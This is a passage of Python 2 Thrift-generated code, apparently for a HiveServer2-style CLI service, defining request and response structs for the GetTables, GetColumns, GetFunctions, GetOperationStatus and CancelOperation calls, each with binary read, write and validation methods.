      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetSchemasResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTablesReq(object):
  """Thrift request struct for the GetTables call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
   - catalogName: catalog filter string, or None for no filter.
   - schemaName: schema filter string, or None for no filter.
   - tableName: table filter string, or None for no filter.
   - tableTypes: list of table-type strings to match, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.STRING, 'catalogName', None, None, ), # 2
    (3, TType.STRING, 'schemaName', None, None, ), # 3
    (4, TType.STRING, 'tableName', None, None, ), # 4
    (5, TType.LIST, 'tableTypes', (TType.STRING,None), None, ), # 5
  )
  def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, tableName=None, tableTypes=None,):
    self.sessionHandle = sessionHandle
    self.catalogName = catalogName
    self.schemaName = schemaName
    self.tableName = tableName
    self.tableTypes = tableTypes
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.catalogName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.schemaName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.tableName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.LIST:
          # Element-by-element list decode (generated temp names).
          self.tableTypes = []
          (_etype139, _size136) = iprot.readListBegin()
          for _i140 in xrange(_size136):
            _elem141 = iprot.readString();
            self.tableTypes.append(_elem141)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTablesReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.catalogName is not None:
      oprot.writeFieldBegin('catalogName', TType.STRING, 2)
      oprot.writeString(self.catalogName)
      oprot.writeFieldEnd()
    if self.schemaName is not None:
      oprot.writeFieldBegin('schemaName', TType.STRING, 3)
      oprot.writeString(self.schemaName)
      oprot.writeFieldEnd()
    if self.tableName is not None:
      oprot.writeFieldBegin('tableName', TType.STRING, 4)
      oprot.writeString(self.tableName)
      oprot.writeFieldEnd()
    if self.tableTypes is not None:
      oprot.writeFieldBegin('tableTypes', TType.LIST, 5)
      oprot.writeListBegin(TType.STRING, len(self.tableTypes))
      for iter142 in self.tableTypes:
        oprot.writeString(iter142)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required sessionHandle field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTablesResp(object):
  """Thrift response struct for the GetTables call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTablesResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTableTypesReq(object):
  """Thrift request struct for the GetTableTypes call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
  )
  def __init__(self, sessionHandle=None,):
    self.sessionHandle = sessionHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTableTypesReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required sessionHandle field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTableTypesResp(object):
  """Thrift response struct for the GetTableTypes call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTableTypesResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetColumnsReq(object):
  """Thrift request struct for the GetColumns call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
   - catalogName: catalog filter string, or None for no filter.
   - schemaName: schema filter string, or None for no filter.
   - tableName: table filter string, or None for no filter.
   - columnName: column filter string, or None for no filter.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.STRING, 'catalogName', None, None, ), # 2
    (3, TType.STRING, 'schemaName', None, None, ), # 3
    (4, TType.STRING, 'tableName', None, None, ), # 4
    (5, TType.STRING, 'columnName', None, None, ), # 5
  )
  def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, tableName=None, columnName=None,):
    self.sessionHandle = sessionHandle
    self.catalogName = catalogName
    self.schemaName = schemaName
    self.tableName = tableName
    self.columnName = columnName
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.catalogName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.schemaName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.tableName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRING:
          self.columnName = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetColumnsReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.catalogName is not None:
      oprot.writeFieldBegin('catalogName', TType.STRING, 2)
      oprot.writeString(self.catalogName)
      oprot.writeFieldEnd()
    if self.schemaName is not None:
      oprot.writeFieldBegin('schemaName', TType.STRING, 3)
      oprot.writeString(self.schemaName)
      oprot.writeFieldEnd()
    if self.tableName is not None:
      oprot.writeFieldBegin('tableName', TType.STRING, 4)
      oprot.writeString(self.tableName)
      oprot.writeFieldEnd()
    if self.columnName is not None:
      oprot.writeFieldBegin('columnName', TType.STRING, 5)
      oprot.writeString(self.columnName)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required sessionHandle field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetColumnsResp(object):
  """Thrift response struct for the GetColumns call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetColumnsResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetFunctionsReq(object):
  """Thrift request struct for the GetFunctions call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
   - catalogName: catalog filter string, or None for no filter.
   - schemaName: schema filter string, or None for no filter.
   - functionName: function name pattern (required; see validate()).
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.STRING, 'catalogName', None, None, ), # 2
    (3, TType.STRING, 'schemaName', None, None, ), # 3
    (4, TType.STRING, 'functionName', None, None, ), # 4
  )
  def __init__(self, sessionHandle=None, catalogName=None, schemaName=None, functionName=None,):
    self.sessionHandle = sessionHandle
    self.catalogName = catalogName
    self.schemaName = schemaName
    self.functionName = functionName
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.catalogName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.schemaName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.functionName = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetFunctionsReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.catalogName is not None:
      oprot.writeFieldBegin('catalogName', TType.STRING, 2)
      oprot.writeString(self.catalogName)
      oprot.writeFieldEnd()
    if self.schemaName is not None:
      oprot.writeFieldBegin('schemaName', TType.STRING, 3)
      oprot.writeString(self.schemaName)
      oprot.writeFieldEnd()
    if self.functionName is not None:
      oprot.writeFieldBegin('functionName', TType.STRING, 4)
      oprot.writeString(self.functionName)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset.

    Unlike the other Get*Req structs here, both sessionHandle and
    functionName are required.
    """
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    if self.functionName is None:
      raise TProtocol.TProtocolException(message='Required field functionName is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetFunctionsResp(object):
  """Thrift response struct for the GetFunctions call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetFunctionsResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetOperationStatusReq(object):
  """Thrift request struct for the GetOperationStatus call.

  Attributes:
   - operationHandle: TOperationHandle being queried (required).
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 1
  )
  def __init__(self, operationHandle=None,):
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetOperationStatusReq')
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required operationHandle field is unset."""
    if self.operationHandle is None:
      raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetOperationStatusResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
     - operationState
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
        (2, TType.I32, 'operationState', None, None, ),  # 2
    )

    def __init__(self, status=None, operationState=None,):
        self.status = status
        self.operationState = operationState

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I32:
                    self.operationState = iprot.readI32();
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TGetOperationStatusResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        if self.operationState is not None:
            oprot.writeFieldBegin('operationState', TType.I32, 2)
            oprot.writeI32(self.operationState)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        # Only `status` is required; operationState is optional.
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TCancelOperationReq(object):
    # Thrift-generated request struct (Python 2); indentation restored.
    """
    Attributes:
     - operationHandle
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ),  # 1
    )

    def __init__(self, operationHandle=None,):
        self.operationHandle = operationHandle

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
